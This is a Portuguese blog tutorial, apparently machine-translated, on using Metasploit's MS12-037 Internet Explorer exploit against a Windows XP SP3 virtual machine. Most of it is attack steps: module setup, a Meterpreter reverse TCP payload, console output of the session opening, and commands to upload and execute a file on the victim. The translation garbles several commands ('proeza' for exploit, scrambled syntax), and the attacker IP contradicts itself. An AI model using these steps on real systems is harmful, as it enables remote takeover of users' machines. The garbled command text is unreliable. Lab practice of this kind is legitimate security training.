- Alvo OS: XP3
- Atacante OS: Backtrack ou qualquer PenTesting Distros
Preparando sistema da vítima:
Instale o XP3 em um dos VM. Alterar o adaptador de rede da VM para o Host-somente o adaptador. (Se você não sabe o que estou falando, então use este manual do Virtualbox )
Preparando o sistema Atacante:
Atualizar os módulos do Metasploit, digitando o seguinte comando no Terminal:
msfupdate
Ou você pode baixar o " ms12_037_same_id.rb módulo 'e pasta neste diretório "opt/metasploit/msf3/modules/exploits/windows/browser / /"
Configurar as definições para a sua exploração em Metasploit:
Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.
Tipo "use exploit/windows/browser/ms12_037_same_id" no console.
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.
Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.
Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.
Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp
Ok, vamos lançar o exploit.
Digite "proeza" no console.
Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/".
Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:
[*] Cliente requerente: /
[*] Usando o JRE ROP
[*] Enviando html
[*] Envio de estágio (752.128 bytes) para 192.168.56.12
[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)
Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.
Agora, você pode controlar o sistema vítima de computador usando Meterpreter.
Por exemplo:
'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.
'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.
Nenhum comentário:
Postar um comentário